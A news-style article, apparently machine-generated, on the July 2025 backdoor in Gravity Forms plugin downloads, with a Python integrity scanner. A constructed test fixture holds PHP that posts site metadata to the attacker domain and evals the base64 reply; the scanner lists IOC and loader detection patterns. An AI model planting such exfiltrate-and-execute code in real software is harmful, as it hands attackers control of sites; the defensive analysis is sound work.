WordPress Gravity Forms Bedeviled by a Sophisticated Supply Chain Attack: A Deeper Dive into the Compromise
Copies of the widely deployed WordPress plugin Gravity Forms served from the vendor's own download channel carried a backdoor for a short window in July 2025, in what the WordPress security firm Patchstack identified as a supply chain attack. The tampered packages were limited to versions 2.9.11.1 and 2.9.12 obtained by manual download or composer during that window. Administrators who installed or reinstalled Gravity Forms in that period should treat the site as potentially compromised, update to the clean release, and check for signs of infection using the methods described below.
Key points:
The Gravity Forms download package itself was compromised; this was not a bug in the plugin's own code but malicious code injected upstream.
Patchstack traced the problem to a backdoored gravityforms/common.php that collected site metadata and sent it in a POST request to an attacker-controlled domain.
The infected files were present only in versions 2.9.11.1 and 2.9.12 as distributed between July 10 and 11.
RocketGenius has confirmed that the malicious code blocked update attempts, contacted external servers, and added an administrator account that gave the attacker control of the website.
Users are advised to update Gravity Forms to the latest clean version and check for signs of infection using the methods RocketGenius recommends.
The attack highlights the need to verify downloaded packages, to monitor what installed code talks to, and to treat the vendor distribution channel as part of the attack surface.
The WordPress plugin Gravity Forms has been compromised in a supply chain attack: for roughly two days the official download channel handed out plugin packages with a backdoor injected into them. What makes the incident notable is not a flaw in the plugin's own code but where the tampering happened. The attacker altered the package upstream, in the vendor's distribution, so a routine "download the latest version from the official site" was itself the infection vector, and no vulnerability scan of the plugin's published source would have revealed it.
According to Patchstack's report, the firm received a suspicious request generated by a copy of the plugin that had been downloaded from the official Gravity Forms website. Investigation showed that gravityforms/common.php in that package contained a backdoor which collected extensive site metadata: the site URL, the admin path, the active theme, the installed plugins, and the PHP and WordPress versions.
The backdoor sent that metadata in a POST request to gravityapi.org/sites, a domain under the attackers' control. The server replied with base64-encoded PHP malware, disguised as a tool called "WordPress Content Management Tools", which the backdoor decoded and executed. The dropped payload exposed functions such as handle_posts(), handle_media() and handle_widgets() that gave the attacker remote code execution on the site without any authentication.
The tampered code was found only in Gravity Forms versions 2.9.11.1 and 2.9.12 as offered for manual download between July 10 and 11. A composer install that pulled one of those versions in the same window received the infected copy as well. Because the window was short and the builds were specific, the population at risk is sites that installed or reinstalled the plugin from a fresh download in that period, not every site running Gravity Forms.
RocketGenius, the developer behind Gravity Forms, has confirmed that the malicious code blocked update attempts (so the infected build could not simply be replaced through the normal updater), contacted external servers to fetch additional payloads, and added an administrator account that gave the attacker complete control of the website. The company has published instructions for administrators to check whether their installation contains the malicious code and has released a clean build. Note that updating replaces the plugin files but not what the attacker added elsewhere: after updating, the administrator account the malware created, any outbound connections to gravityapi.org, and any extra files in the plugin directory still need to be checked.
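One way to turn the indicators in this write-up into a repeatable check, as an added example (this is not code from Patchstack, RocketGenius or the plugin): a Python scanner that walks a plugin directory, flags the callback domain and the handler names quoted above, flags the base64_decode()/eval() loader pattern a dropped PHP payload depends on, and compares every file's SHA-256 against a manifest built from a clean copy of the plugin. The sample PHP files, the "clean" manifest, and the names gf_sync_site, GFCommon::get_version and includes/content-tools.php are constructed for the example; a real run builds the manifest from a freshly downloaded clean release and scans wp-content/plugins/gravityforms.

```python
import hashlib
import os
import re
import tempfile
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Indicators quoted in the article: the callback host and the handler
# function names of the second-stage payload.
IOC_STRINGS = ("gravityapi.org", "handle_posts", "handle_media", "handle_widgets")

# Loader pattern: base64-decoded text handed to eval(), in one call or in two.
EVAL_B64_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)
B64_CALL_RE = re.compile(r"base64_decode\s*\(", re.I)
EVAL_CALL_RE = re.compile(r"\beval\s*\(", re.I)


@dataclass(frozen=True)
class Finding:
    relpath: str  # relative to the plugin root, "/" separators on every OS
    reason: str


def _relpath(full: str, root: str) -> str:
    return os.path.relpath(full, root).replace(os.sep, "/")


def _sha256(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map every file under a clean plugin tree to its SHA-256."""
    manifest: Dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[_relpath(full, root)] = _sha256(full)
    return manifest


def scan_plugin_dir(root: str, manifest: Optional[Dict[str, str]] = None) -> List[Finding]:
    """Scan a live plugin tree; an empty list means nothing was flagged."""
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = _relpath(full, root)
            with open(full, "rb") as f:
                text = f.read().decode("utf-8", errors="replace")
            for ioc in IOC_STRINGS:
                if ioc in text:
                    findings.append(Finding(rel, f"contains indicator {ioc!r}"))
            if EVAL_B64_RE.search(text) or (B64_CALL_RE.search(text) and EVAL_CALL_RE.search(text)):
                findings.append(Finding(rel, "base64_decode()/eval() loader pattern"))
            if manifest is not None:
                if rel not in manifest:
                    findings.append(Finding(rel, "file not in clean manifest"))
                elif manifest[rel] != _sha256(full):
                    findings.append(Finding(rel, "hash differs from clean manifest"))
    return findings


# Constructed sample files (not real Gravity Forms code), used only to
# exercise the scanner.
CLEAN_COMMON = "<?php\nclass GFCommon {\n    public static function get_version() { return '2.9.13'; }\n}\n"
CLEAN_API = "<?php\nfunction gf_api_version() { return 2; }\n"
# Mimics the behaviour described above: metadata POSTed to the callback host,
# and the base64 reply decoded and executed. Inert text, never run.
TAMPERED_COMMON = CLEAN_COMMON + (
    "function gf_sync_site() {\n"
    "    $meta = array('url' => home_url(), 'php' => PHP_VERSION);\n"
    "    $r = wp_remote_post('https://gravityapi.org/sites', array('body' => $meta));\n"
    "    eval(base64_decode(wp_remote_retrieve_body($r)));\n"
    "}\n"
)
# A dropped second-stage file carrying the handler names from the write-up.
DROPPED_TOOL = (
    "<?php\n/* WordPress Content Management Tools */\n"
    "function handle_posts($p) {}\nfunction handle_media($p) {}\nfunction handle_widgets($p) {}\n"
)


def _write(path: str, content: str) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as f:
        f.write(content)


def demo() -> Tuple[List[Finding], List[Finding]]:
    """Scan a clean tree against its own manifest, then a tampered copy."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = os.path.join(tmp, "clean", "gravityforms")
        _write(os.path.join(clean, "common.php"), CLEAN_COMMON)
        _write(os.path.join(clean, "includes", "api.php"), CLEAN_API)
        manifest = build_manifest(clean)

        live = os.path.join(tmp, "live", "gravityforms")
        _write(os.path.join(live, "common.php"), TAMPERED_COMMON)
        _write(os.path.join(live, "includes", "api.php"), CLEAN_API)
        _write(os.path.join(live, "includes", "content-tools.php"), DROPPED_TOOL)
        return scan_plugin_dir(clean, manifest), scan_plugin_dir(live, manifest)


if __name__ == "__main__":
    clean_findings, live_findings = demo()
    print("clean tree:", clean_findings or "no findings")
    for hit in live_findings:
        print(f"{hit.relpath}: {hit.reason}")
```

The hash comparison is the strongest of the three checks: it catches a modified file even if the attacker changes the domain or obfuscates the loader, but it is only as good as the reference copy, so build the manifest from a package obtained after the vendor confirmed its distribution was clean, not from a cached download, and bear in mind that a checksum published by the same compromised server proves nothing. The string and regex checks are cheap triage and will also fire on legitimate code that decodes base64 near an eval(), so treat a hit as a reason to look, not as proof. Updating the plugin replaces the files but not the administrator account the malware created; list administrators with wp user list --role=administrator --fields=ID,user_login,user_email,user_registered and remove any you did not create.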
This attack is a stark reminder that "keep software up to date" is necessary but not sufficient: here the then-current release was the carrier, and a site that installed the latest version in the affected window got the backdoor precisely because it followed that advice. It is also a testament to the ingenuity of attackers, who by compromising one distribution channel reached a plugin used across a very large number of websites. The incident shows why supply chain security has to be part of software development and distribution, not an afterthought. An ounce of prevention is worth a pound of cure, but the ounce has to be applied to the supply chain: verifying downloaded packages against a reference obtained out of band, rather than trusting whatever the download server serves, and monitoring outbound connections so that a form plugin talking to an unfamiliar domain gets noticed quickly.
In light of this incident, WordPress administrators should update Gravity Forms to the latest clean version, check for signs of infection using the methods RocketGenius has published, and review administrator accounts and outbound traffic. If the backdoor is found, the site should be treated as fully compromised rather than merely cleaned of one file, since the attacker held an administrator account and could execute arbitrary code. More broadly, the attack underscores the value of ongoing security monitoring and regular vulnerability assessments; it is a wake-up call for developers to secure their build and distribution pipelines, and for users to remain cautious when installing plugins, even from official sources.
In conclusion, this supply chain attack highlights the ever-present threat of upstream compromise and the need for robust security measures across every stage of software development and delivery. By staying informed and taking proactive steps to secure our websites, we can minimize the risk of similar incidents occurring in the future.
Published: Fri Jul 11 15:32:52 2025 by llama3.2 3B Q4_K_M